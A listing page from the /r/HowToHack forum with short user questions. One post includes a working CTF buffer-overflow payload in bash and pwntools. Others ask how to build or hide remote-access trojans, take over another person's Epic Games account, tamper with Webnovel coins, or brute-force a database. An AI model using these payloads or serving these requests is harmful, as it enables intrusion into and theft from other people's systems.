/r/HowToHack

Welcome! This is your open hacker community designed to help you on the journey from neophyte to veteran in the world of underground skillsets. Ask, Answer, Learn.


We teach you how to do it, use it at your own risk.

473,177 Subscribers

3

Payloads: making your own

Can you make your own to execute from your own GIST URL (domain) and your script be used for your own payload?

1 Comment
2024/12/02
04:40 UTC

4

Tools that can be used to structure Wifi password masks, for cracking via hashcat or aircrack. Are they around?

I've been learning about network wifi security, and I've noticed that a LOT of router models I've seen have very specific password patterns used. For example:

Netgear NightHawk: <word><word><3-digits>
Fios G3100: <word><3-digits><word><3-digits>

I'm not sure if I'm just seeing a small sample size, but...

So why hasn't there been a tool made that's *just* a database for these patterns? They seem so much more "regularized" than personal passwords. Seclist's collection of wifi pass resources is a total joke (probable-v2* collection of max 4800 passwords? Is this 2001?). On the database you would type a company and Model# and you get possible patterns. It seems logical, since default wifi passwords are often kept as is because they appear "secure", but it's hard to argue that if they follow "maskable" patterns. routerpasswords.com has default admin credentials, but what's the use if you can't access the actual network?

Is there something prohibitive about setting this up? Obviously there's a whole lot of routers out there, and I personally wouldn't know how to find the information without having the router in front of me. But I'm sure there's other ways to find the patterns, and a user-sourced database could make the task much easier.

So again, is there something I'm missing that makes this not a "thing"?

2 Comments
2024/12/01
21:10 UTC

67

Does hacking come with coding or does coding come with hacking?

I'm really interested and I want to know should I just start with learning to hack right away without having a coding background or do I need to code to hack. (I realize hacking needs code but I was thinking that while learning hacking and stuff like that I'll slowly build the basics and the advanced stuff with it)

42 Comments
2024/11/28
01:22 UTC

13

How can rendering javascript be unsafe?

I saw a video where John McAfee claimed that porn sites for example installed keyloggers on both smartphones and computers.

How is that even possible? I know enough JavaScript to manipulate DOM elements, and I understand the privacy concerns with javascript tracking every move within an open site. But I don’t see how it can run or access anything beyond that, like running commands on the system.

I can also see how someone can exploit vulnerabilities on a site that uses JavaScript, but that’s a separate issue.

So how is it possible, if possible at all, to execute and install software on a computer with JavaScript, and how can I protect myself from this?

I wasn’t sure about the flair, so please let me know if it’s wrong.

17 Comments
2024/11/24
03:15 UTC

1

Problem with sending 0x00 to server in python - stupid null byte

Edit: Newlines and I are stupid
I try to solve a pwn ctf challenge: I just have to input a given address after some padding to edit RIP.
I solved the challenge using a one-liner in bash. My problem is that the downloadable binary doesn't contain the flag and ncat doesn't want to work when piping input into it.

That's why I rewrote the code in python, and everything works except that the necessary null byte in the payload isn't sent.
I use pwnlib and already consulted the docs for the relevant function (sendline) but there's no info about special handling of null byte.
How do I find efficiently the reason why the null byte isn't sent, I don't know how to continue / narrow down the issue.

My (locally working) bash code:

a=""; for i in {0..99}; do if printf '%s\x96\x11\x40\x00' "$a" | ./updater | grep -i flag; then break; fi; a="${a}a"; done

My not working python code:

#!/bin/env python
from pwn import *
from sys import argv

for i in range(100):
    if len(argv) > 1:
        r = process("./updater")
    else:
        r = remote(
            "UUID.library.m0unt41n.ch", 31337, ssl=True
        )
    payload = b"a" * i + b"\x96\x11\x40\x00" # => Here is the relevant NULL byte
    print(payload) # => NULL byte is present
    r.sendline(payload)
    ans = r.recvall()
    print(i, ans) # => NULL byte is not present, rest of payload is
    if b"flag" in ans.lower():
        break

(Btw. why isn't it possible to replace ./updater in the bash code with ncat --ssl uuid.library.m0unt41n.ch 31337?)

4 Comments
2024/11/24
01:23 UTC

8

hacker is using pushbullet

Can I track where the data is going? My friend's mom was made to download the app and they are stealing the message and OTP.

3 Comments
2024/11/23
07:57 UTC

0

Medusa question

I've downloaded Medusa (password cracking program). Watched multiple tutorial videos on it. Read a bunch of articles explaining the command line flags. Thought I had it right only to get messages that all 100 passwords tried were correct (no way). Any help would be greatly appreciated.

3 Comments
2024/11/22
16:34 UTC

0

So IK it sounds bad but these are my goals

  1. Find a way to enter webnovel
  2. Find out how to code and add coins to myself
  3. Add coins
  4. Gift people gifts

(Webnovel severely underpays its writers and it's below minimum wage most of the time, that on top of just straight up being able to steal your novel and stop paying you any time)

Idk how to hack servers ethically or not so this is my goal atm

4 Comments
2024/11/22
15:58 UTC

2

Need assistance with Dom Redirects

Hi all, occasionally I've seen DOM redirect findings in Burp. I'm not an expert on the DOM. I went through the PortSwigger lab on the topic and honestly watched one of the community videos on it that was very helpful in helping me understand it. Unfortunately that lab used the exec.location sink which was easy to exploit in the URL bar. But I'm now looking at an example that uses location.href and it doesn't seem to work in the same way.

Can anyone give me some guidance either directly or providing a resource that will help me understand these other sinks and how I can interact with them?

1 Comment
2024/11/22
02:31 UTC

45

Hacker in Writing

Hi! I know absolutely nothing about hackers, but one of the characters in a story I’m writing is pretty good at hacking into websites and etc - I don’t want to write this character stupidly, and I know my lack of hacking knowledge will probably make my writing really dumb when it comes to this. I was wondering if I could get like a very simple rundown on the absolute basics of hacking, or some tips every hacker knows? Or anything else you think will be useful!

I’m really sorry if I’m not meant to ask this on this subreddit, I looked on another hacking subreddit and it was more specific but there was a link to this one :D I’ll delete if need be!!

52 Comments
2024/11/21
11:41 UTC

4

Nmap Scan Results Not Replicated in Target Website

I ran an Nmap scan with the command nmap -p 80,443 --script vuln target.com. It showed vulnerabilities, but when I try to access them, I get a "page not found" error. I'm appending the file names in the scan result to the URL (like target.com/BackupConfig.php), but I still get a "page not found" error. As I'm new to this, I'm wondering if I'm missing something. Could someone please help me understand what I might be doing wrong?

Below are scan results and I'm not able to open any file or folder.

/BackupConfig.php: NETGEAR WNDAP350 2.0.1 to 2.0.9 potential file download and SSH root password disclosure

/Info.live.htm: Possible DD-WRT router Information Disclosure (BID 45598)

/cgi-bin/config.exp: Cisco RV320/RV325 Unauthenticated Diagnostic Data & Configuration Export (CVE-2019-1653)

/jmx-console/: Authentication was not required

/zip/: Potentially interesting folder

/_docs/: Potentially interesting folder

2 Comments
2024/11/21
06:29 UTC

0

HowTo break out of kiosk mode RHEL 7

So, I have a RHEL 7 system that automatically logs into a restricted kiosk user that only has access to Firefox ESR & Wireshark. All hotkeys are disabled. About:config is locked down. I was hoping to locate a way to open a terminal. I can access the file system via File, Open. But I can't actually execute any files. I was able to save a file to home, var and tmp. So I have write access to at least those directories.

Is there some buried menu in either app where I can launch a terminal?

1 Comment
2024/11/21
03:30 UTC

0

Where does one start?

So recently I've been hacked, because I was just downloading some torrents. Well, and it just really motivated me; I was always interested in learning so. But I have no idea where to start. I have some basic knowledge of Python, but even tho I watched many many videos I am still quite confused about where to start.

2 Comments
2024/11/20
14:27 UTC

13

Is Game Hacking Really That Easy?

Hey everyone,

I've been really intrigued by how many hacks seem to be out there for massive games backed by huge companies. Take games like GTA, Fortnite, or COD or whatever—they’ve got insane budgets, are backed by huge companies, massive dev teams, and you’d think ironclad security. But you still see modders and hackers running wild, like those very common in GTA to cheats in paid Fortnite competitions.

So it got me thinking: does this mean hacking any game is just as easy? Like, what about smaller-scale online games? For example, these mobile strategy games that have people paying so much money like Whiteout Survival or even browser games like Conflict of Nations—are these way easier to hack because they don’t have the same resources or security teams as a Rockstar or Epic Games?

So what is it? Is there something more to it—like the popular games attract more skilled hackers who are motivated to find and exploit weaknesses that spend long weeks/months trying because there’s huge profit involved (selling it to a huge customer base), while less popular games might not even be worth the effort?

I’m genuinely curious because if hacking happens so widely in AAA titles, what stops smaller games from being completely vulnerable? Is hacking games in general just way harder than it looks, or is it more about popularity and payout?

Would love to hear your thoughts on this!

36 Comments
2024/11/20
02:24 UTC

0

I have a question!

Please someone help, what is proxy softcore RTTD, 02.GP3.11V/IP11? Is it a key, license, etc? And what would it do or be used for?

1 Comment
2024/11/20
00:37 UTC

0

Need help with scammer trying to scam my company via text

Hey all. My company has been getting fake CEO texts for the past couple of years. We are a pretty tight company that communicates every day, so everyone knew immediately that it was not the actual CEO. At this point it's more of an annoyance. I would love to teach the person a lesson and reverse hack them or something. Any tips or tricks? Or is this not the right place for that kind of info? Thanks

4 Comments
2024/11/19
17:32 UTC

0

“Cobalt strike beacon”

Hey guys. I’m in need of y’all help. I received an email saying they gained access to my email and they installed consul strike beacon and they’re monitoring me and I should send money via bitcoin and if I don’t they’ll release my information and my personal videos of me pleasuring myself. I’ve done my research and realized that it’s a typical scam email. The only worry I have now is they sent that to me…from me. The same email. For example Johndoe@gmail to johndoe@gmail. Please help

6 Comments
2024/11/18
16:31 UTC

1

Is there a WiFi Router Adapter Like a network adapter like Alfa?

I’m wanting to use a Pi on the go as a VPN host for my devices. I’m wanting to be able to use ssh to the Pi from my phone, and connect other devices, more securely from a public network I may join traveling.

Is there a network adapter version of a travel router? That gets its power from a USB port on a Pi?

5 Comments
2024/11/18
16:01 UTC

0

[ Removed by Reddit ]

[ Removed by Reddit on account of violating the content policy. ]

11 Comments
2024/11/18
14:41 UTC

0

getting started in RATs (Remote access trojan)

Yo, I want to start coding a RAT for a project. I'm currently learning cybersecurity and I'm trying to code different projects. I need some roadmap or resources for RAT developing in C#, can anyone help? Thanks!

1 Comment
2024/11/17
18:39 UTC

6

What do you guys think of online courses for MalDev?

Hi! I'm an engineering student from France trying to learn more about making malware (specifically for Windows). I already know a bit about C, Python, as well as HTML/CSS/JS.

So I was wondering: what do you guys think of courses like Sektor7, MalDev Academy, and zeropointsecurity?

Maldev Academy looks nice, but it's way too expensive (180$ for 6 months, seriously??)

Another thing I'm worried about is the service closing down. Since it's not just a zip file or a PDF I can download, how exactly am I supposed to follow the course in the event of the service closing down?

7 Comments
2024/11/17
15:09 UTC

0

Is there any way I can use my Android phone to simulate bad usb by bluetooth?

Can I use my Android phone to install an application so I can connect to any device and simulate a bad usb script?

1 Comment
2024/11/17
14:45 UTC

0

How to hack Epic games Account Data

How to get Epic games Account data from just seeing the ingame name. So how to actually hack an Epic games account with just the ingame name or just the email.

12 Comments
2024/11/17
11:31 UTC

10

How to get around Knox?

Our government has been handing out devices such as tabs and cell phones to students. I have received a Samsung Tab A9 which is under the Knox administration of the government, so it's neither stolen nor a company device. They don't care what u do with it except the fact that u can't change the wallpaper.

This makes the device quite laggy and forces the faces of politicians as forced wallpapers. How can I get rid of Knox?

I only have a basic understanding of Knox and all methods I have found are temporary in nature, i.e. it's only able to disable it for a short while, i.e. only till next factory reset or update, or else the other methods are basically to root the device, which is also reported to degrade the performance by quite a lot, such as battery performance, so back to square one.

What should I do to get a permanent fix? Is it possible without touching the hardware or not? Would a basic IMEI change be sufficient to bypass KNOX?

12 Comments
2024/11/17
06:36 UTC

0

C Compiler...?

Soooo I have this classic book (Hacking: The Art of Exploitation 2nd edition) and I set the CD or ISO up on VirtualBox. The terminal pops up and all but how do I write the first C program?

Edit: A few minutes after I posted this I figured it out. I'm just gonna save this post for the future.

10 Comments
2024/11/17
05:22 UTC

0

How do I hack mysql?

Hey guys. I just got started with web hacking. I've been tasked with trying to access MySQL database. So far I've tried to brute force the passwords with metasploit BUT it's taking too long and my internet can't keep up. The database is for a vulnerable target web app. Any tips or resources on how I can work around this? My primary goal is to see whether I can gain access to the DBMS and possibly run personal queries. The version is MySQL 5.7.44. Please help

16 Comments
2024/11/16
16:12 UTC

12

How are working massive zipbombs made?

I find zipbombs to be funny as fuck and so I collect them. Looking to make a few more of my own to pad out my collection. My question is how one makes them "detonate" properly instead of extracting only the first layer.

Edit: I don't intend to send them to people, I just like having them. No malicious intent here, just an autistic fixation on zipbombs.

5 Comments
2024/11/16
08:07 UTC

0

" Hacking with python by alphy books " is outdated or is still useful ?

* for MOD

there's no reviews available on Google and the book is also different on shopping sites, so please don't remove this post

thanks.

4 Comments
2024/11/16
07:39 UTC

3

Reverse shell help

So I recently learnt about reverse shells, so using netcat I set my host machine Parrot as listener and Kali as attack machine. Everything turned out okay, so I decided to phone a friend and see if I could connect to his machine (Windows). I used www.revshells.com to generate a msf script; it failed due to public IP and private IP being different and accessing said ports on the internet. Any advice??

8 Comments
2024/11/14
16:26 UTC

1

Fud rat in images or pdfs

Hey guys, is it possible to embed fud rat in images or pdf files, or is there any other way you would suggest?

9 Comments
2024/11/14
07:04 UTC
